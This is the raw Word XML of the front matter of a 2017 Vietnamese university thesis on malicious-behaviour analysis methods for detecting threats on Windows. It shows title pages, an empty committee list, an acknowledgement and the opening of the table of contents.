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5238383"/>
    <w:bookmarkStart w:id="1" w:name="_Hlk483998759"/>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="001417F4" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00ED091A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>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-155575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-170180</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5895975" cy="8553450"/>
                <wp:effectExtent l="19050" t="19050" r="47625" b="38100"/>
                <wp:wrapNone/>
                <wp:docPr id="1" name="Rectangle 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5895975" cy="8553450"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="476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EDA2BB" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:-12.25pt;margin-top:-13.4pt;width:464.25pt;height:67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" filled="f" strokecolor="black [3213]" strokeweight="3.75pt">
                <v:stroke linestyle="thickThin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00526388" w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>VIETNAM NATIONAL UNIVERSITY - HO CHI MINH CITY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526388" w:rsidRPr="00811A53" w:rsidRDefault="00526388" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UNIVERSITY OF INFORMATION TECHNOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526388" w:rsidRPr="00811A53" w:rsidRDefault="00526388" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FACULTY OF COMPUTER NETWORK AND COMMUNICATION</w:t>
      </w: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r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LÊ THANH BÌNH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526388" w:rsidRPr="00811A53" w:rsidRDefault="00526388" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CHÂU THIỆN HƯNG</w:t>
      </w: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r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>THESIS REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526388" w:rsidRPr="00811A53" w:rsidRDefault="00526388" w:rsidP="00526388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>STUDY</w:t>
      </w:r>
      <w:r w:rsidR="00126710">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> MALICIOUS BEHAVIOR</w:t>
      </w:r>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> ANALYSIS METHODS TO DETECT SECURITY RISKS ON </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>WINDOWS</w:t>
      </w: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28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BACHELOR OF ENGINEERING INFORMATION SECURITY</w:t>
      </w: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062D79" w:rsidRPr="00811A53" w:rsidRDefault="00062D79" w:rsidP="00062D79">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Instructor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00062D79" w:rsidRPr="00811A53" w:rsidRDefault="00062D79" w:rsidP="00062D79">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PhD. NGUYỄN ANH TUẤN</w:t>
      </w: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E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HỒ CHÍ MINH CITY, 2017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00ED091A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="470FE074" wp14:editId="47229E01">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-155575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-170180</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5895975" cy="8553450"/>
                <wp:effectExtent l="19050" t="19050" r="47625" b="38100"/>
                <wp:wrapNone/>
                <wp:docPr id="2" name="Rectangle 2"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5895975" cy="8553450"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="476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D60851" id="Rectangle 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:-12.25pt;margin-top:-13.4pt;width:464.25pt;height:67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" filled="f" strokecolor="black [3213]" strokeweight="3.75pt">
                <v:stroke linestyle="thickThin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>VIETNAM NATIONAL UNIVERSITY - HO CHI MINH CITY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UNIVERSITY OF INFORMATION TECHNOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FACULTY OF COMPUTER NETWORK AND COMMUNICATION</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LÊ THANH BÌNH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CHÂU THIỆN HƯNG</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THESIS REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>STUDY</w:t>
      </w:r>
      <w:r w:rsidR="00126710">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F7373B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ACTIVITY ANALYSIS ME</w:t>
      </w:r>
      <w:r w:rsidR="000F005C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">THODS ON WINDOWS FOR ADVANCED THREAD DETECTION </w:t>
      </w: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28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BACHELOR OF ENGINEERING INFORMATION SECURITY</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Instructor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRPr="00811A53" w:rsidRDefault="00E31F6B" w:rsidP="00E31F6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PhD. NGUYỄN ANH TUẤN</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ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HỒ CHÍ MINH CITY, 2017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001425DB" w:rsidRPr="00811A53" w:rsidRDefault="001425DB">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001425DB" w:rsidRPr="00E445CE" w:rsidRDefault="001425DB" w:rsidP="00E445CE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc483575477"/>
      <w:bookmarkStart w:id="3" w:name="_Toc483676740"/>
      <w:bookmarkStart w:id="4" w:name="_Toc483834684"/>
      <w:r w:rsidRPr="00E445CE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DANH SÁCH HỘI ĐỒNG BẢO VỆ KHÓA LUẬN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="001425DB" w:rsidRPr="00811A53" w:rsidRDefault="001425DB" w:rsidP="001425DB">
      <w:pPr>
        <w:spacing w:after="256"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001425DB" w:rsidRPr="00811A53" w:rsidRDefault="001425DB" w:rsidP="001425DB">
      <w:pPr>
        <w:spacing w:after="167"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:t xml:space="preserve">Hội đồng chấm khóa luận tốt nghiệp, thành lập theo Quyết định số </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31F6B" w:rsidRDefault="001425DB" w:rsidP="00AF4EA3">
      <w:pPr>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:t>…………………… ngày ………………</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00811A53">
        <w:t>…..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00811A53">
        <w:t xml:space="preserve"> của Hiệu trưởng Trường Đại học Công nghệ Thông tin. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02E5E" w:rsidRDefault="00B02E5E" w:rsidP="00B02E5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="OLE_LINK1"/>
      <w:r>
        <w:t>……………………………………………</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Chủ tịch</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="5"/>
    <w:p w:rsidR="00B02E5E" w:rsidRDefault="00B02E5E" w:rsidP="00B02E5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>……………………………………………</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Thư ký</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02E5E" w:rsidRDefault="00B02E5E" w:rsidP="00B02E5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>……………………………………………</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Ủy viên</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02E5E" w:rsidRDefault="00B02E5E" w:rsidP="00B02E5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>……………………………………………</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Ủy viên</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02E5E" w:rsidRPr="00811A53" w:rsidRDefault="00B02E5E" w:rsidP="00B02E5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="164" w:line="359" w:lineRule="auto"/>
        <w:ind w:left="345" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF4EA3" w:rsidRPr="00811A53" w:rsidRDefault="00AF4EA3">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00811A53">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF4EA3" w:rsidRPr="00E445CE" w:rsidRDefault="00AF4EA3" w:rsidP="00E445CE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc483575478"/>
      <w:bookmarkStart w:id="7" w:name="_Toc483676741"/>
      <w:bookmarkStart w:id="8" w:name="_Toc483834685"/>
      <w:r w:rsidRPr="00E445CE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>COMMENT OF INSTRUCTOR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00AF4EA3" w:rsidRPr="00811A53" w:rsidRDefault="00AF4EA3" w:rsidP="00AF4EA3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8789"/>
        </w:tabs>
        <w:spacing w:after="244" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pP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p>
    <w:p w:rsidR="00AF4EA3" w:rsidRPr="00E445CE" w:rsidRDefault="00AF4EA3" w:rsidP="00E445CE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc483575479"/>
      <w:bookmarkStart w:id="10" w:name="_Toc483676742"/>
      <w:bookmarkStart w:id="11" w:name="_Toc483834686"/>
      <w:r w:rsidRPr="00E445CE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>COMMENT OF REVIEWER</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00AF4EA3" w:rsidRPr="00811A53" w:rsidRDefault="00AF4EA3" w:rsidP="00AF4EA3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8789"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pP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p>
    <w:p w:rsidR="00C437AB" w:rsidRPr="00E445CE" w:rsidRDefault="00C437AB" w:rsidP="00E445CE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc483575480"/>
      <w:bookmarkStart w:id="13" w:name="_Toc483676743"/>
      <w:bookmarkStart w:id="14" w:name="_Toc483834687"/>
      <w:r w:rsidRPr="00E445CE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ACKNOWLEDGEMENT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="000C0B89" w:rsidRDefault="00CD556F" w:rsidP="00CD556F">
      <w:r w:rsidRPr="00CD556F">
        <w:t xml:space="preserve">With supports and helps of many individuals, this thesis has become reality. We would like to express our appreciation to all of them. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD556F">
        <w:t>First of all</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD556F">
        <w:t>, we would like to thank not only teachers in faculty of computer network and communications but also teachers in University of Information Technology who have taught us very useful lectures with all of their passion, which provide necessary knowledge for us to finish this thesis. Especially</w:t>
      </w:r>
      <w:r w:rsidR="004E2049">
        <w:t>, we would like to express our appreciation to</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD556F">
        <w:t xml:space="preserve"> professor Nguyen Anh Tuan, our instructor, who has inspired and guided us to dive deeply into information security with this thesis. Secondly, we would like to thank our friends who has helped, supported and exchanged knowledge with us since we started studying at University of Information Technology. Finally, we would like to thank our family for supporting us during the time we develop this project.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0B89" w:rsidRDefault="000C0B89">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="1433631299"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="000C0B89" w:rsidRPr="00E445CE" w:rsidRDefault="00877325" w:rsidP="00877325">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00E445CE">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
            <w:t>TABLE OF CONTENTS</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E445CE" w:rsidRPr="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00E445CE"/>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="000C0B89">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="878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85303703" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chapter 1.</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INTRODUCTION</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303703 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303704" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1</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Motivation</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303704 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
